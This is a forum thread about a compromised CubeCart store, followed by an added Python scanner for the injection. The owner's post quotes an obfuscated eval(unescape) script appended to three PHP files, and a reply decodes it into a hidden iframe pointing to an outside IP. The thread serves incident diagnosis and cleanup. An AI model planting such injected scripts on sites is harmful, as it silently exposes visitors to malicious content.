
Hijacking?


djf


Can anyone help me please, I know virtually nothing about php.

Recently I have been under attack from an unscrupulous competitor and started to wonder if my files have been altered.

I checked and in fact 3 files have been altered recently that I would never touch as I have no clue what I would need to change in them. They are index.php in the root folder and /Admin/index.php and login.php. I downloaded them and compared them to the originals and there is an extra line at the end of them. I don't know if these files get altered in the normal course of events or not.

This is the line that is different, it's the very last one and this script line has been added:

<?php include("includes/footer.inc.php"); ?><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%39%64%38%33%36%62%30%30%32%35%66%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%31%31%36%2e%35%30%2e%31%35%2e%32%35%2f%73%74%61%74%73%2f%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%32%32%31%37%29%2b%27%32%37%5c%27%20%77%69%64%74%68%3d%31%36%33%20%68%65%69%67%68%74%3d%32%35%39%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

Perhaps I'm being paranoid but if anyone could let me know if this is a hijacking or not I would appreciate it.

Thanks in advance.

David


Yes, the script bit is worrying. Have you applied any mods? If not, upload all the core PHP files overwriting, with the exception of the includes/global.inc.php file. Take a backup first ;) and make sure the files are from the same version of CubeCart.

Speak to your hosting company; if your site has been affected, it's likely the culprit has got into the server by another route. The hosting company needs to know.


That code inserts the following JavaScript into your site:

window.status='Done';

document.write('<iframe name=79d836b0025f src=\'http://116.50.15.25/stats/?'+Math.round(Math.random()*42217)+'27\' width=163 height=259 style=\'display: none\'></iframe>');

Do you have an old version of WordPress on your hosting account? Through a Google search, this hack is common amongst older versions of WordPress. Regardless, this is malicious code and you will need to get your hosting provider to look into this. It's very likely that malicious code has been inserted into multiple files (inc. server configuration files).

My suggestion would be to shut down your store while this is being fixed. If Google crawls your site and determines that your site is infected with this code, your domain may be marked as "malware".

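The check described in this thread (find the appended eval(unescape("%..")) line and see what it decodes to) can be run over every PHP file in the store. The following is an added example, not part of the original posts or of CubeCart; the function names and the tracker.example sample are constructed for illustration, and it assumes the injected script uses the same plain %XX packing shown above.

```python
import re
import sys
from urllib.parse import unquote

# eval(unescape("...")) whose argument is nothing but %XX / %uXXXX escapes
PACKED = re.compile(
    r'eval\s*\(\s*unescape\s*\(\s*(["\'])((?:%u[0-9a-fA-F]{4}|%[0-9a-fA-F]{2})+)\1\s*\)\s*\)')
IFRAME = re.compile(r'<iframe\b[^>]*>', re.I)
SRC = re.compile(r'src\s*=\s*\\?["\']?([^\s"\'\\>]+)', re.I)
HIDDEN = re.compile(r'display\s*:\s*none|(?:width|height)\s*=\s*\\?["\']?0\b', re.I)

def js_unescape(s):
    """Decode like JavaScript unescape(): %uXXXX first, then %XX as Latin-1."""
    s = re.sub(r'%u([0-9a-fA-F]{4})', lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")

def scan(text):
    """Return one finding per packed script: offset, decoded JS, iframe sources."""
    findings = []
    for m in PACKED.finditer(text):
        js = js_unescape(m.group(2))
        tags = IFRAME.findall(js)
        findings.append({
            "offset": m.start(),
            "decoded": js,
            "iframe_src": [s.group(1) for t in tags for s in [SRC.search(t)] if s],
            "hidden": any(HIDDEN.search(t) for t in tags),
        })
    return findings

def pack(js):
    """Build a constructed test line in the same %XX form as the injected one."""
    body = "".join("%%%02x" % b for b in js.encode("latin-1"))
    return '<script>eval(unescape("%s")); </script>' % body

# Constructed sample: tracker.example is a placeholder host, not taken from the thread.
SAMPLE_JS = ("document.write('<iframe src=\\'http://tracker.example/stats/?'"
             "+Math.random()+'\\' style=\\'display: none\\'></iframe>');")
CLEAN = '<?php include("includes/footer.inc.php"); ?>'
INFECTED = CLEAN + pack(SAMPLE_JS)

if __name__ == "__main__":
    for path in sys.argv[1:]:  # e.g. every *.php file under the store root
        with open(path, encoding="latin-1") as fh:
            for f in scan(fh.read()):
                print(path, f["offset"], f["iframe_src"], "hidden" if f["hidden"] else "visible")
```

A hit means the file should be replaced from a known-good copy of the same version; a clean result only rules out this one packing style, so comparing against the original files remains the stronger check.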
